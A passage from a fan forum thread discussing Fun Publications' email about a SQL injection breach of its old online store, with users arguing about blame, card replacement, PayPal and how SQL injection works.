Fun Publications sent out an email with further information about the recent credit card fraud issue affecting them:
Here is the latest update on the credit card security investigation.The firm we have hired to analyze our former ecommerce server and software has preliminarily determined that we did incur a SQL injection code attack sometime before Christmas. Our ISP did have a commercial product installed that was supposed to defeat these types of attacks, but apparently it failed.
This allowed the hackers access to our order information. While it is still unknown exactly what data they were able to harvest (investigation continues) we need to assume that they were able to extract all of our order information. The security firm thinks that this attack has allowed the hackers to come back periodically and harvest more information. However, once the old server was taken out of service (around February 21st) there was nothing left for them to access.
Once this information was stolen, (no matter if it was back before Christmas) there is no time frame as to when the thieves may sell or try to use the information to purport credit card theft.
What does this mean to me?
We are asking again that anyone who has used a credit card in our old online systems in the past year (NOT THE NEW STORE) to get your card replaced immediately. If you have done this already, there is no action required on your part.
We apologize for the inconvenience, we know this whole thing is a pain, but it is better to replace the cards than have to deal with any issues that may result from this theft of data. Even though the amount of fraud has greatly declined, we are still receiving a customer report every few days of someone else (who hasn’t replaced their cards) getting hit. We strongly encourage you to take this step immediately if you have not done so already. Again, this DOES NOT pertain to any cards that have been used in the new store.
What is the plan?
We are still working on all of the issues and are several weeks away from a final resolution. Our new store is currently offline while we complete the entries and audit the data from the renewals we received last week. Just to reiterate, this new store is a totally different piece of software, at a totally different hosting site. There are hundreds of other retailers using this same software as it is hosted by the software creators.
We hope to have the store online and registration system back online sometime next week. When the store comes back online, we will be adding products slowly so it will take some time to have everything back in the store.
Thank you for your patience and support during this trying issue.
Brian
XJunky
http://www.tfw2005.com/boards/trans…dom-card-issues-2-2012-a-112.html#post7462519
Kaijumaster
As are we.
Alucard77
OK, defender of FP…. here is the problem:
1- They are blaming others.
2- Your job is to defend your database. Security has many layers. So saying your ISP was responsible shows that there were no layers after the ISP layer. There was protection they themselves could have had in place to make sure if the ISP failed, this wouldn't effect them.
3- Let's also not forget the data stored in said database was against their contract with VISA/Mastercard and left them in-compliant.
You do realize that every company that the ISP is on would then be effected and hacked right? You know how many companies and ISP can have right?
So my problem is they are still blaming others, which goes to show to negligence is continuing.
Do I need to post the comedy of errors (21 at last count). I am tired of making this argument. But if they made 1 or 2 mistakes then fine. They made 21 mistakes in the process. So guess what, they are open for criticism.
Here is the thing I don't understand, why are you defending them? You think they need defending?
Once they show ownership and the fact that they are moving forward, I back off. But they haven't shown that yet. I think that has a right to be said. Sorry if as a fandom I think we should have better then this crap.
Kaijumaster
your not gonna get through. the same people in this place blaming FP are the same people who are spamming every thread they can against FP whether the thread has anything to do with this issue or not. The same people who want FP head on a platter but never make any comments about wanting to catch the people who actually STOLE the information.
Regardless like someone just said, this is turning right back into the cycle of hate the old thread was. FP has sent out a new piece of news…it has been discussed. It's time to lock the thread.
G.B. Blackrock
And, so what? IF FP did have (or believed they have) this, why shouldn't they say so? Why does everything they say have to be attributed to them being evil and horrible? Even if, so far as they know, it happens to be the truth?
Alucard77
This is the part I am reading:
So basically blaming their ISP.
Lumpy
you must be reading something i'm not, because i saw that they said they did have an attack, and it appears to be in conjunction with their old server and software… that, to me, reads as them saying they are guilty… it seems like there was fault on FP's part, as well as whoever told them they were secure…
hahahaha….
Computron34
Checks in thread…….
same as all the other FunPub threads……..
leaves thread.
Alucard77
Well, do we, they are still blaming someone else besides themselves. So they are still saying, they aren't guilty. As usual.
icefox
Me too
My card was hit yesterday, called up and getting a replacement.
Tripredacus
I know see how you are looking at it, which is correct, but that is not how SQLi exploits work. They work by using the web application itself to get the data. The application has the account to access the data already, and if there isn't any validation rules on page actions, you can process commands through the application.
Your code example is not that of an application, but a standard connect to get data to display on the page.
Lumpy
uh… really? no one has their toy… and even if you joined 8 weeks ago, there's no way they'd send the figure to you before the membership cutoff date…
why would that bother you? if you've not cancelled your card at this point, and know about this, then you're taking a risk… if you were living under a rock, or not part of an online forum, then that would give you some leeway.
well, see that's the problem… if you don't report it, then they can say stuff like "reports have gone down" because no one is reporting to them…
I'm sure Hasbro has been involved and knows what's going on, and will probably be looking into what needs to happen for this to not happen again…
yeah, the fact that they had access for months is pretty crazy… i really dislike that, a lot.
well, no, see we assumed a lot of that… now we have full confirmation from their investigation… you know, it's that whole innocent until proven guilty thing…
yeah, i hope those arrive soon, i wonder why they didn't just say something up front weeks ago, when they knew the other toys wouldn't be here on time… unless they were supposed to be on an earlier shipment and something happened out of their control. but even then, it would've been nice to get a heads up.
that may be exactly why they won't take Paypal yet… if you got a figure with 2 right guns, and filed a complaint, even if FP fixed it, Paypal could still give you back all your money… which i personally think is bullshit, because if the problem is fixed, you shouldn't get money back…
Grandum
pfft, they'll still insist on faxing things in in 10 years from now.
Alucard77
Well, if this is the wave of the future, I am sure TFCC will do what they normally do and wait 10 years to implement it.
Composite Ghost
I think you're totally right. They just can't say that's the reason because it would be like saying, yeah, we kind of screw up a lot. So they're sticking with the company line about those excessive fees.
I was at Home Depot last week and they now have the option of paying with Paypal right there on the pin pad. It's the way of the future, TFCC, time to get with the program. Clean up your act and you won't have to worry about all those claims.
Grandum
I'm sorry, but no, that is just wrong on so many levels. You can't write any pages with SQL, that's just not how it works – in order to do that you need to rely on another programming language.
And since you can't print the information you have to rely on whatever templates are allready set up.
Also, let's not get ahead of ourselves. Yes, you can manipulate data in a database IF you have SQL access, but that's not really the case of SQL injection, now is it?
The way it works is that:
1. The server sets up a connection to the database
2. It takes what it thinks is information about what is supposed to be entered into the database
3. The server updates the database
4. The server closes the connection
So, with SQL injection you never get the password/username for the database, so let's separate full SQL access from SQL injection, the two are quite different.
Gah, I guess I will have to show you what I mean – I'll show you a little bit of classic ASP code that can be SQL injected…I chose ASP as that is on a very basic level and can illustrate what I mean:
Here the connection is made by the server – note that 4 important things here are never revealed to the user – the name of the database, the table name, password and the username, all of which would be needed to get access to a database.
Here is what leaves it open to SQL injection – the information is not filtered before written to the database, what you want here is some ASP code by substituting some SQL characters like " and ; – it's just piss poor programming to not substitute those characters
and here we see the system updating the information.
Now, in presenting the information, you would do it like this:
here you have the system setting up the connection to the database
here you have the system loading the data into ASP variables, based on who is logged in
here you have the system displaying the information.
here you have the system closing the connection
In none of these steps do you actually have any way of telling the system to display anything but the two fields chosen, hypothetically, you could log in as another user, provided you've lucked out and guessed your way to the table name, but that would only affect the "to" and "by" field data, there would be no way to display the information from the third column "credit_card"
So, no – just no. you are wrong, plain and simple.
03Mach1
Not to mention paypal ALWAYS sides with the buyer in a dispute. And given FP's history, there would be a lot of claims. From missing/incorrect pieces to never received toys.
Composite Ghost
A while back someone asked Pete if they would consider using Paypal and he said nothing is off the table. I guess Paypal is off the table again. I don't think Brian Savage likes having people question his decisions.
Waverider
Which is mind boggling to me. I use to work at a NOC for a muti-million dollar company that deals with physical and online retail. We maintain and monitor 3 large data centers and over 500 remote servers.
I know you can't really compare a large corporation to a small business like FP. But WTF!? One of the most important things in business is to maintain and protect the DB. FP failed at both in all levels.
airfox
Not to defend Fun Publications, whose badly designed and mantained e-commerce store caused many of us to get our credit card and personal information stolen, but they had already apologized as far back as February 24th:
That's what I'm guessing, from the wording on Brian's email.
Why? There's no crime in the U.S.?
(People complain about FunPub's mishandling of international members, and yet …)
Not so sure. First of all, I doubt they have the access logs from their web servers as far back as December, and most likely the attackers used an anonymizer service.
Exactly. If you have SQL access, you're already in the database, so you can pretty much read and modify it depending on the access granted to the database user used by the web server to connect to the database. ASP or PHP are in an upper layer, and are actually only meant to help you write the pages in a more friendly language.
New information from their email:
1) The method used to hack the store.
2) The timeframe.
To me, that's pretty important information; it lets me know they're following this through.
I don't think the compromised system is in any way tied to their points of sale at BotCon 2010; those POS should go over a landline directly to the bank, and only store information for a couple of hours (worst case scenario).
-airfox